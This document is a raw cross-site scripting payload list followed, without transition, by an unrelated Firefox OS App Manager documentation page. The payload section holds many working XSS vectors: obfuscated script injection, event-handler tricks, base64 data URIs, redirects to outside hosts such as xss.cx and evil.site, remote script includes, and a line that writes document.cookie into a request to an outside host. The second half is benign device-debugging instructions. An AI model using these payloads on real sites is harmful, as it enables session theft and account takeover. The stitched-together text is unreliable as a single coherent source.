<svg><script ?>confirm(1);
<svg><script onlypossibleinopera:-)> confirm(1)
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js'
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script><![CDATA[\]]><![CDATA[u0061]]><![CDATA[lert]]>(1)</script>
"/><svg><script>//
confirm(1);</script </svg>
<svg><script>//
confirm(1);</script </svg>
<svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
<svg><script>confirm(/1/)</script>
<svg><script>confirm("");confirm('yes')//no")</script>
<svg><script>a<svg//onload=confirm(2) />lert(1)</script>
<svg><script>location=<>javascript&#x3A;confirm(1)<!/></script>
<svg><script>/**/confirm(3)//*/</script></svg>
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<svg><style>*{font-family:'<svg onload=confirm(1)>';}</style></svg>
<svg><style><img src=x onerror=confirm(1)></svg>
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>confirm(1)
?t=confirm(1)&k7="><svg/t='&k8='onload='/&k9=/+eval(t)'
test=scriptx=document.createElement(%27script%27);x.innerHTML=%27confirm(location)%27;document.body.appendChild(x);/script¬bot=UzXGjMCo8AoAAFUcKTEAAAAN
<textarea autofocus onfocus=confirm(3)>
<textarea id=ta onfocus=%22write('<script>confirm(1)</script>')%22 autofocus></textarea>
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520confirm(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
"/><textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<textarea name='file"; filename="test.<img src=a onerror=document&#46;location&#61;&#34;http:&#47;&#47;evil&#46;site&#34;>'>
"<textarea onmousemove='confirm(1);'>"
<textarea></textarea>test<!-- </textarea><img src=xx: onerror=confirm(1)> -->
</title><frameset><frame src="data:text/html, fill the whole page and overlap everything<script>confirm(1)</script>">
</title><frameset><frame src="data:text/html,<script>confirm(1)</script>">
<ul><li><svg onload="confirm(1)"></li></ul>
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:confirm(document.location);">
<var onmouseover="prompt(1)">On Mouse Over</var>
<var onmouseover="prompt(1)">On Mouse Over</var>?
"<video src=. onerror=prompt(0)>"
<video src=. onerror=prompt(0)>
<video src="x" onloadstart="confirm(1)">
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
<video><source o?UTF-8?Q?n?error="confirm(1)">
<x data-bind=".:confirm(1)">
<x data-bind=".:\u0061lert(1)">
<x onload'=confirm(1)
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
\x3C
>
>
\x3E
<
<
\x3c
>
>
\x3e
<xml id=cdcat><note><to>%26lt;span style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table>
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
<xmp><img alt="</xmp><img src=xx:x onerror=confirm(1)//">
xss--><!--<script>xss
x”</title><img src%3dx onerror%3dconfirm(1)>
@"><img src=x/onerror=confirm(1)>xss
<script>x=new ActiveXObject("WScript.Shell");x.run('calc');</script>
"><<x>script>confirm(2)<<x>/<x>script>
<img src=x onerror="document.location='http://xss.cx'";>
!#$%&'*+-/=?^_`{}|~@xss.cx
~~)1(trela+tpircsavaj'.split('').reverse().join('').split('~').join(String.fromCharCode(47)).split('+').join(String.fromCharCode(58))).concat('
<xml id=cdcat><note><to>%26lt;span style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table>
<style/></style><img src=1 onerror=confirm(1)></style>
<script>
x="<%";
</script>
<div title="%></script>"<img src=1 onerror=confirm(1)>"></div>
<? foo="><script>confirm(1)</script>">
data:text/html,/*<img src=x '-confirm(1)-' onerror=confirm(1)>*/confirm(1)
'">><marquee><img src=x onerror=confirm(1)></marquee>
<div contextmenu=x>right-click<menu id=x onshow=confirm(1)>
"><b/onclick="javascript:window.window.window['confirm'](1)">bold
<body language=vbs onload=window.location='data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+'>
<IFRAME/SRC=DATA:TEXT/HTML;BASE64,ICA8U0NSSVBUIC8NU1JDPSINSFRUUFM6DS8NDS8NSEVJREVSSS5DSC96DSINID4NPC9TQ1JJUFQNDT5>
%uff1cscript%uff1econfirm%uff0876310%uff09%uff1c/script%uff1e
<script>``.constructor.constructor`confirm\`1\````</script>
eval("\x61\x6c\x65\x72\x74\x28\x31\x29”)
<script>var%20x%20=%20“a”;%20confirm(1);//”;</script>
<source srcset="x"><img onerror="confirm(5)"></picture>
<svg><script>confirm`1`<p><svg><script>confirm`1`<p>
<script>``.constructor.constructor`confirm\`1\````</script>
<i/style=x=x/**/(confirm(1))('\')expression\')>
<i/style=x=x/**/n(confirm(1))('\')expressio\')>
<div style='x:anytext/**/xxxx/**/n(confirm(1)) ("\"))))))expressio\")'>aa</div> //
<script>write(“<img/src=//xss.cx/?”+cookie.replace(/\s/g,"")+“>”)></script>
<base href="javascript:\"> <a href="//%0aconfirm(2);//">XSS</a>
<base href="javascript:\"> <a href="//%0a%0dconfirm(2);//">XSS</a>
<base href="javascript:\"> <a href="//%00confirm(2);//">XSS</a>
<base href="javascript:\"> <a href="//xss.cx/xss.js">XSS</a>
<script src="//⒕₨"></script>)
<anything onmouseover=javascript:confirm(1)>
<%00/title>
<""/title>
</title"">
</title id="">
<a href='javascript:http://@cc_on/confirm%28location%29'>click</a>
<img src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">
<a href="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="><img src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></a>
"> "><iframe src=http://xss.cx onload=confirm(5) <<iframe src=a> "><iframe src=http://xss.cx onload=confirm(8) <
% E2% 88% 80% E3% B8% 80% E3% B0% 80script% E3% B8% 80confirm% 281% 29% E3% B0 % 80 80/script% E3% B8%
"><svg/onload=prompt(1)>
"onresize=prompt(1)>
<svg/onload=prompt(1)
<svg><script>prompt(1)<b>
<svg><script>prompt(1)</script>
<script>eval.call`${'prompt\x281)'}`</script>
<script>prompt.call`${1}`</script>
--!><svg/onload=prompt(1)
<p class="comment" title=""><svg/a="></p>
<p class="comment" title=""onload='/*"></p>
<p class="comment" title="*/prompt(1)'"></p>
"><svg/a=#"onload='/*#*/prompt(1)'
"><script x=#"async=#"src="//⒛₨
[U+2028]prompt(1)[U+2028]-->
<ſvg><ſcript/href=//⒕₨>
<ſcript/async/src=//⒛₨>
<img src=""><SCRIPT/ASYNC/SRC="/〳⒛₨">
"><script>`#${prompt(1)}#`</script>
<iframe/*%%%%25%%%25*/src='javascript:vbscript:%0b%0a/**/;//:http://www.google.com/?=%0a/**/javascript:%0a/*oleeeeeeeeeeeeeee*/alert(2);'>
<A HREF="javascript	:alert(1)">
<%= puts "test" %>
'"--></style></script><script>alert(0x0009BE)</script>
<a href="javascript:history:alert(this.history.length)">click</a>
xss=<link rel=import href=http://xss.cx/xss.js >
<% a=%><iframe/onload=alert(1)//>
<%/z=%><p/onresize=alert(1)//>
<%/z=%><p/onresize=alert(1)//>
<xml/></xml><iframe/onload=alert(1)>
<xmp/></xmp><iframe/onload=alert(1)>
<comment/></comment><iframe/onload=alert(1)>
<fORm/hello^waf/aCTIon=j	avas	cript
:alert/**/(docu	ment.coo	kie)><InPuT/TyPe=submit
<iframe onload="(function*(){}).constructor('alert(location)')().next()">
<iframe%20onload="new%20Promise($=>alert(location))">
<iframe onload=alert.call(...[top,location])>
<iframe onload=`${alert(location)}`>
<title/></title><iframe/onload=alert(1)>
<element onpointerover=alert(1)>
<div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Bring-Mouse-Over-Me</div>
<element onpointerover=alert(1)>
<a b="c">d</a>
<![<CDATA[C%Ada b="c":]]]>
<![
<![C b="c">
<![CDb m="c">
<![CDAĹĹ@
<![CDAT<!
<!DOCTY
a=<script>alert(1);/*&b=*/</script>
<!DOCTY.
<?xml version="2.666666666666666666667666666">
<?xml standalone?>
<script>a="<!--";//</script>alert(1)--></script>
<script>a="<%"//</script>alert(1)//%></script>
<svg><script xlink:href="url(#)"></script></svg>
<base href="mailto://any/<img src="bod#y"></script>
\x3Cscript\x3Ealert(document.domain);\x3C\x2Fscript\x3E
data:text/html<svg/onload=parentNode.parentNode.parentNode[/locatio/.source+/n/.source]='javascript:confirm(4)'//>
<math><XSS href="javascript:alert(location)">xss
<math><mrow href=javascript:alert(1)>XSS</mrow></math>
<input+name=xss+value="%26lt;script>alert%26lpar;1)%26lt;/script>">
<script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>
<script>[{get[alert(1)]()false}]</script>
<script>a = {get[alert`1`](){}}</script>
<svg><a xyz:href=123><text>test</text></svg>
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
)\
<javascript:prompt(document.cookie)>
<javascript:alert('XSS')>
\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:alert('XSS'))
\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)
"><script/src=data:,alert(1)%2b"
"><script/src=data:,alert(1)%26sol;%26sol;
</script><script>alert(1)+"
"</script><svg><script>alert(1)+"";
/* RFI STOP */
<p>App Manager is available for Firefox OS 1.2 or later, lower versions are supported in <a href="/en-US/docs/Tools/Firefox_OS_1.1_Simulator">Firefox OS 1.1 Simulator</a>. The App Manager is being replaced by the <a href="/en-US/docs/Tools/WebIDE">WebIDE</a>, starting from Firefox 33. The WebIDE provides all the features of the App Manager and also features an editing environment to create and develop Firefox OS apps.</p>
</div>
<p>{{EmbedYouTube("z1Bxg1UJVf0")}}</p>
<p>The App Manager is composed of:</p>
<ul>
<li>An <a href="#Apps_panel"><em>Apps panel</em></a>, which manages local apps (app source code located on your computer) and apps hosted externally, allowing you to package and install them on your device or simulator, and debug them using Toolboxes</li>
<li>A <a href="#Device_panel"><em>Device panel</em></a>, which displays information about the connected device including Firefox OS version installed, permissions required for using device APIs on the device, and apps installed</li>
<li><a href="/en-US/docs/Tools_Toolbox"><em>Toolboxes</em></a>, which are are sets of developer tools (web console, inspector, debugger, etc.) that can be connected to a running app via the Apps panel to perform debugging operations</li>
</ul>
<h2 id="Quick_setup"><a name="Configuring_device">Quick setup</a></h2>
<p>This section is designed to get you up and running as soon as possible; if you need some more detail please skip forward to the {{ anch("Device and system configuration") }} section and start reading from there. Also see the {{ anch("Troubleshooting") }} section for help if you are having trouble.</p>
<ol>
<li>Make sure you have Firefox Desktop 26+ installed</li>
<li>Open the App Manager (in the URL bar, type <code>about:app-manager</code>, or go to <em>Tools > Web Developer > App Manager</em> in your Firefox menu.) This should appear in a new browser tab.</li>
<li>If you don't have a real device:
<ol>
<li><a href="https://ftp.mozilla.org/pub/mozilla.org/labs/fxos-simulator/">Install the Firefox OS Simulator</a> add-on, then go back to the App Manager tab of your browser.</li>
<li>In App Manager's bottom toolbar, click on <em>Start Simulator</em>, then click on the name of the installed simulator, which should appear there.</li>
</ol>
</li>
<li>If you have a real device:
<ol>
<li>Make sure your device is running Firefox OS 1.2+</li>
<li>On Windows, make sure to install the drivers provided by your phone manufacturer</li>
<li>In the Settings of your device, disable Screen Lock (<code>Settings > Phone lock > <code>Lock Screen</code></code>) and enable Remote Debugging (<code>Settings > Device information > More information > Developer</code>)</li>
<li><a href="https://ftp.mozilla.org/pub/mozilla.org/labs/fxos-simulator/">Install the ADB Helper</a> add-on in Firefox Desktop</li>
<li>Connect your device to your machine via a USB cable</li>
<li>You should see the name of your device in the App Manager's bottom bar. Click on it.</li>
</ol>
</li>
<li>The bottom bar should show "Connected to: xxx"</li>
<li>Click on the <em>Apps</em> panel and add an app (packaged or hosted)</li>
<li>The <em>Refresh</em> button validates your app and installs it on the Simulator/Device</li>
<li>The <em>Debug</em> button connects the developer tools to the running app</li>
<li><strong>See the {{ anch("Troubleshooting") }} section for help if you are having trouble</strong></li>
</ol>
<h2 id="Device_and_system_configuration">Device and system configuration</h2>
<p>The first thing you'll need to do when using the App Manager is make sure your system and phone are set up correctly. This section will run through all the steps required.</p>
<h3 id="Firefox_OS_1.2_required">Firefox OS 1.2+ required</h3>
<p>Make sure your device is running Firefox OS 1.2/Boot2Gecko 1.2 or higher. To check which version of Firefox OS the device is runing, go to <code>Settings > Device Information > Software</code>.</p>
<p>If you don't have a high enough version installed, depending on what phone you have you will need to either install an available nightly build of Firefox 1.2+, or configure and build it yourself from source.</p>
<p>Builds available:</p>
<ul>
<li><a href="http://downloads.geeksphone.com/">Geeksphone Keon/Peak builds</a> (to find out more about using these, read <a href="/en-US/docs/Mozilla/Firefox_OS/Developer_phone_guide/Updating_and_Tweaking_Geeksphone">Updating and Tweaking your Firefox OS Developer Preview phone/Geeksphone</a>)</li>
<li>More to follow</li>
</ul>
<div class="note">
<p><strong>Note</strong>: To build your own Firefox OS 1.2+ distribution, follow the instructions located at <a href="/en-US/docs/Mozilla/Firefox_OS/Building_and_installing_Firefox_OS">Building and installing Firefox OS</a>, starting with <a href="/en-US/docs/Mozilla/Firefox_OS/Firefox_OS_build_prerequisites">Firefox OS build prerequisites</a>.</p>
</div>
<h3 id="Remote_debugging">Remote debugging</h3>
<p>Next, you need to enable remote debugging in Firefox OS. To do so, go to <code>Settings > Device information > More information > Developer</code> and check the Remote Debugging checkbox.</p>
<h3 id="Adb_Helper_Add-on" name="Adb_Helper_Add-on">ADB or ADB helper</h3>
<p>The process uses the Android Debug Bridge (ADB) to handle the device-computer connection and communication. There are two options for running ADB:</p>
<ul>
<li>
<p>Let Firefox handle ADB (recommended). <a href="https://ftp.mozilla.org/pub/mozilla.org/labs/fxos-simulator/">Install the ADB Helper add-on</a>, which makes the process easier. With this installed, there's no need to install the ADB, and no need to type the <code>adb forward</code> command: everything is handled by the add-on.</p>
{{DownloadButton("https://ftp.mozilla.org/pub/mozilla.org/labs/fxos-simulator/", "Download ADB Helper Add-on")}}</li>
<li>Use ADB manually. You need to have it installed on your computer: download and install <code>adb</code> as explained in <a href="/en-US/Firefox_OS/Debugging/Installing_ADB">Installing ADB</a>. You'll need to enable port forwarding by entering the following command into your terminal:
<pre>
adb forward tcp:6000 localfilesystem:/data/local/debugger-socket</pre>
Note that you'll need to do this every time the phone is restarted or unplugged then re-plugged.</li>
</ul>
<div class="note">
<p><strong>Note</strong>: There's no need to run this command if you installed the ADB Helper Add-on.</p>
</div>
<h2 id="Connecting_your_device_to_the_App_Manager">Connecting your device to the App Manager</h2>
<p>With all your configuration done, it's now time to plug your device into your computer and start the App Manager:</p>
<ol>
<li>Plug the device into your computer via USB.</li>
<li>Disable Screen lock on your device by going to <code>Settings > Screen Lock</code> and unchecking the <code>Lock Screen</code> checkbox. This is a good idea because when the screen gets locked, the phone connection gets lost, meaning it is no longer available for debugging.</li>
<li>Start the App Manager — In Firefox Desktop select the <code>Tools > Web Developer > App Manager</code> menu option, or type <code>about:app-manager</code> in the URL bar.</li>
<li>At the bottom of the App Manager tab, you will see a connection status bar (see screenshot below). You should be able to connect your device by clicking the "Connect to localhost:6000" button.</li>
<li>If this works successfully, a prompt should appear on your device: "An incoming request to permit remote debugging connection was detected. Allow connection?". Tap the OK button (You may also have to press the power button on the phone so you can see the prompt.) The connection status bar should update to say "Connected to B2G", with a Disconnect button available to press if you want to cancel the connection.</li>
</ol>
<p><img alt="" src="https://mdn.mozillademos.org/files/6263/connection-status.png" style="display:block; height:30px; margin:0px auto; width:600px" /></p>
<div class="note">
<p><strong>Note</strong>: The other controls in the connection status bar allow you to connect a simulator to the App Manager, which we cover in the next section, below, and change the port that the connection happens on. If you change the port, you'll also need to enable port forwarding for this port as well, as instructed in the {{anch("Enable port forwarding")}} section, above.</p>
</div>
<h2 id="Using_a_Firefox_OS_Simulator_Add-on"><a name="Simulator">Using a Firefox OS Simulator Add-on</a></h2>
<p>If you haven't got a real device available to use with App Manager, you can still try it out using a <a href="/en-US/docs/Tools/Firefox_OS_Simulator">Firefox OS Simulator</a> Add-on. To start off, install the simulator with the following button (multiple versions are available; you are advised to install them all, for maximum flexibility):</p>
<p>{{DownloadButton("https://ftp.mozilla.org/pub/mozilla.org/labs/fxos-simulator/", "Install Simulator")}}</p>
<p>Once you've installed the simulator(s), you need to go to about:app-manager to see the connection status bar at the bottom of the App Manager tab, and click the "Start simulator" button. At least three buttons will appear:</p>
<ul>
<li>"Firefox OS 1.3", "Firefox OS 1.2" ... etc. (or something similar): the left-most buttons contain the names of the simulator versions you have installed. Click one to start a connection to a simulator.</li>
<li>"Add": the middle button navigates to the simulator install links in this article, so you can add more Simulators (Firefox OS 1.3, Firefox OS 1.4, etc.)</li>
<li>"Cancel": the right hand button cancels the connection.</li>
</ul>
<div class="note">
<p><strong>Note</strong>: The Firefox OS 1.5 Simulator has been removed, as 1.5 was changed to 2.0. If you have the Firefox OS 1.5 Simulator installed, it won't automatically update to 2.0, so you should uninstall 1.5 and install 2.0 instead. The Firefox OS 2.0 simulator will then automatically update.</p>
</div>
<div class="note">
<p><strong>Note</strong>: The Firefox OS 1.2 Simulator has been removed, as no phones are likely to be released with version 1.2 installed — this version is therefore of limited value, and it makes more sense to spend your time debugging on other versions.</p>
</div>
<h2 id="Running_custom_builds_in_the_App_Manager">Running custom builds in the App Manager</h2>
<p>Note that you can run custom B2G Desktop and Gaia/Gecko builds in the App Manager via the simulator. Read <a href="/en-US/Firefox_OS/Running_custom_builds_in_the_App_Manager">Running custom Firefox OS/Gaia builds in the App Manager</a> for instructions on how to do this.</p>
<h2 id="Apps_panel_Test_and_debug_Firefox_OS_apps"><a name="Apps_panel">Apps panel</a>: Test and debug Firefox OS apps</h2>
<p>Now that everything is working, let's review the functionality available inside the App Manager, starting with the Apps panel. From here, you can import an existing app to push onto your device, for testing and debugging:</p>
<ul>
<li>To install a locally stored app, click on the plus next to the "Add Packaged App" label and use the resulting file chooser dialog to select the directory your app is contained inside.</li>
<li>To install an externally hosted app, enter the absolute URL of the app's manifest file into the text field inside the "Add Hosted App" box, then press the plus button.</li>
</ul>
<p>Information about your app should appear on the right hand side of the window, as seen below:</p>
<p><img alt="" src="https://mdn.mozillademos.org/files/6261/apps-panel.png" style="display:block; height:375px; margin:0px auto; width:600px" /></p>
<h3 id="Manifest_editor">Manifest editor</h3>
<p>From Firefox 28 onwards, the Apps Panel includes an editor for the app manifest:</p>
<p><img alt="" src="https://mdn.mozillademos.org/files/6613/apps-panel-fx-28.png" style="display:block; margin:0px auto; width:600px" /></p>
<h3 id="Debugging">Debugging</h3>
<p>Clicking on <em>"Update"</em> will update (install) the app on the device. Clicking on <em>"debug"</em> will connect a toolbox to the app, allowing you to debug its code directly:</p>
<p><img alt="" src="https://mdn.mozillademos.org/files/6265/debug.png" style="display:block; height:375px; margin:0px auto; width:600px" /></p>
<div class="note">
<p>You'll enjoy playing around with the toolbox — try altering the DOM, CSS etc. and you'll see the updates reflected on the device in realtime. Such updates will be saved on the installed app code; you'll see them next time you open the app on the device.</p>
</div>
<p>Before Firefox 28, the tools are launched in a separate window. From Firefox 28 onwards, the tools are launched in a separate tab in the App Manager itself, alongside the Apps and Device tabs. The tab is given your app's icon so it's easy to find:</p>
<p><img alt="" src="https://mdn.mozillademos.org/files/6615/toolbox-fx-28.png" style="display:block; height:375px; margin:0px auto; width:600px" /></p>
<h3 id="Errors">Errors</h3>
<p>If an app was not added successfully — for example if the URL was incorrect, or you selected a packaged app folder — an entry will be added to the page for this app, but this will include error information.</p>
<p><img alt="" src="https://mdn.mozillademos.org/files/6259/apps-error.png" style="display:block; height:375px; margin:0px auto; width:600px" /></p>
<p>You can also delete an app from this view, by hovering over the App name/description on the left of the window, and pressing the "X" button that appears in each case. This however doesn't remove the app from the device. To do that you need to manually remove the app using the device itself.</p>
<h2 id="Device_panel_2"><a name="Device_panel">Device panel</a></h2>
<p>The <em>Device</em> tab displays information about the connected device. From the <em>"</em>Installed Apps<em>"</em> window, apps on the device can be started and debugged.</p>
<p><img alt="" src="https://mdn.mozillademos.org/files/6267/device-tab.png" style="display:block; height:375px; margin:0px auto; width:600px" /></p>
<div class="note">
<p>Note: Certified Apps are not listed by default. <a href="#Debugging_Certified_Apps">See how to debug certified apps</a>.</p>
</div>
<p><a name="permissions"></a>The "Permissions" window shows the required privileges for different <a href="/en-US/docs/WebAPI">Web APIs</a> on the current device:</p>
<p><img alt="" src="https://mdn.mozillademos.org/files/6269/permissions.png" style="display:block; height:375px; margin:0px auto; width:600px" /></p>
<p>Finally, you can take a screenshot of the current device display by clicking the "Screenshot" button. The screenshot appears in a new tab on Firefox, and from there you can save or discard it as you wish.</p>
<h2 id="Debugging_Certified_Apps_2"><a name="Debugging_Certified_Apps">Debugging Certified Apps</a></h2>
<p>Currently only devices running a development build of Firefox OS 1.2+ are capable of debugging certified apps. If you have a development build, you can enable certified app debugging by changing the pref <code>devtools.debugger.forbid-certified-apps</code> to <code>false</code> in your profile. To do this, follow the steps below:</p>
<h3 id="Using_a_real_device">Using a real device</h3>
<ol>
<li>
<p>On your computer, enter the following command in Terminal/console to enter your device's filesystem via the shell:</p>
<pre class="brush: bash">
adb shell</pre>
<p>Your prompt should change to <code>root@android</code>.</p>
</li>
<li>
<p>Next, stop B2G running using the following command:</p>
<pre class="brush: bash">
stop b2g</pre>
</li>
<li>
<p>Navigate to the following directory:</p>
<pre>
cd /data/b2g/mozilla/*.default/</pre>
</li>
<li>
<p>Here, update the prefs.js file with the following line:</p>
<pre class="brush: js">
echo 'user_pref("devtools.debugger.forbid-certified-apps", false);' >> prefs.js</pre>
</li>
<li>
<p>After you've finished editing and saving the file, start B2G again using the following command:</p>
<pre class="brush: bash">
start b2g</pre>
</li>
<li>
<p>Exit the android filesystem using the <code>exit</code> command; this will return you to your normal terminal prompt.</p>
</li>
<li>
<p>Next, reconnect to the App Manager and you should see certified apps appear for debugging.</p>
</li>
</ol>
<h3 id="Using_the_B2G_desktop_client">Using the B2G desktop client</h3>
<p class="brush: js">With the B2G desktop client, the preference is already defined in your profile in <code>greprefs.js</code>, located at the root of your B2G desktop client folder. Stop your B2G desktop client and edit the file to turn the <code>devtools.debugger.forbid-certified-apps</code> preference to <code>false</code>. Then restart the B2G client and connect the App Manager. You should now see all applications.</p>
<div class="note">
<p>Note: If you want to add this preference to your Gaia build you can run <code>make DEVICE_DEBUG=1 reset-gaia</code>.</p>
</div>
<h2 id="Troubleshooting_2"><a name="Troubleshooting">Troubleshooting</a></h2>
<p id="My_device_is_not_recognized">If the device is not recognized:</p>
<ul>
<li>If clicking the button corresponding to your Firefox OS phone doesn't do anything, make sure you haven't connected an Android phone at the same time as the Firefox OS phone to your computer.</li>
<li>Read the <a href="#Configuring_device">Device and system configuration</a> section thoroughly, and make sure all the steps are followed:</li>
<li>Is your device running at least Firefox OS 1.2?</li>
<li>Don't see all the apps? Do you need to enable <a href="#Debugging_Certified_Apps">Certified Apps debugging</a>?</li>
<li>Did you enable "Remote Debugging" in the settings of your phone?</li>
<li>If you are not using the <a href="#Adb_Helper_Add-on">ADB Helper add-on</a>:
<ul>
<li>Did you successfully run the <code>adb forward</code> command?</li>
</ul>
</li>
<li>If you are using the <a href="#Adb_Helper_Add-on">ADB Helper add-on</a> and your device is not listed in the bottom toolbar:
<ul>
<li>If you use Linux, <a href="http://developer.android.com/tools/device.html#setting-up">make sure to setup udev correctly</a></li>
<li>If you use Windows, <a href="http://developer.android.com/tools/device.html#setting-up">make sure to install the appropriate drivers</a></li>
<li>You can also enable verbose logging to gather diagnostics:
<ul>
<li>Use about:config to set the pref "<span class="message"><span class="content"><span class="email">extensions.adbhelper@mozilla.org.sdk</span>.console.logLevel"</span></span> to the string value "all"</li>
<li>Disable and re-enable the ADB Helper add-on from the add-ons manager, or restart Firefox</li>
<li>Open the App Manager again</li>
<li>In the <a href="/docs/Tools/Browser_Console">Browser Console</a>, you should now see additional output lines that mention "adbhelper"</li>
<li>If you see them but aren't sure what they mean, stop by the <a href="https://wiki.mozilla.org/DevTools/GetInvolved#Communication">#devtools room on IRC</a> or <a href="https://bugzilla.mozilla.org/enter_bug.cgi?alias=&assigned_to=nobody%40mozilla.org&attach_text=&blocked=&bug_file_loc=http%3A%2F%2F&bug_ignored=0&bug_severity=normal&bug_status=NEW&cf_blocking_b2g=---&cf_crash_signature=&cf_status_b2g18=---&cf_status_b2g_1_1_hd=---&cf_status_b2g_1_2=---&cf_status_firefox24=---&cf_status_firefox25=---&cf_status_firefox26=---&cf_status_firefox27=---&cf_status_firefox_esr17=---&cf_status_firefox_esr24=---&cf_tracking_b2g18=---&cf_tracking_firefox24=---&cf_tracking_firefox25=---&cf_tracking_firefox26=---&cf_tracking_firefox27=---&cf_tracking_firefox_esr17=---&cf_tracking_firefox_esr24=---&cf_tracking_firefox_relnote=---&cf_tracking_relnote_b2g=---&comment=&component=Developer%20Tools%3A%20App%20Manager&contenttypeentry=&contenttypemethod=autodetect&contenttypeselection=text%2Fplain&data=&defined_groups=1&dependson=&description=&flag_type-203=X&flag_type-37=X&flag_type-41=X&flag_type-5=X&flag_type-607=X&flag_type-720=X&flag_type-721=X&flag_type-737=X&flag_type-748=X&flag_type-781=X&flag_type-787=X&flag_type-791=X&flag_type-799=X&flag_type-800=X&flag_type-802=X&flag_type-803=X&flag_type-809=X&flag_type-825=X&form_name=enter_bug&keywords=&maketemplate=Remember%20values%20as%20bookmarkable%20template&op_sys=All&priority=--&product=Firefox&qa_contact=developer.tools%40firefox.bugs&rep_platform=x86&requestee_type-203=&requestee_type-41=&requestee_type-5=&requestee_type-607=&requestee_type-748=&requestee_type-781=&requestee_type-787=&requestee_type-791=&requestee_type-800=&short_desc=&status_whiteboard=&target_milestone=---&version=Trunk">file a bug</a> with the log output</li>
</ul>
</li>
</ul>
</li>
<li>See <strong>"???????"</strong> instead of the device name on Linux? You have permissions issues. <a href="http://developer.android.com/tools/device.html#setting-up">Make sure to setup udev correctly</a>.</li>
<li>Is your phone screen unlocked?</li>
<li>If the command "adb devices" shows no entries even though the phone is connected and unlocked, you may have to <a href="http://blog.fh-kaernten.at/wehr/?p=1182">edit adb_usb.ini</a>.</li>
</ul>
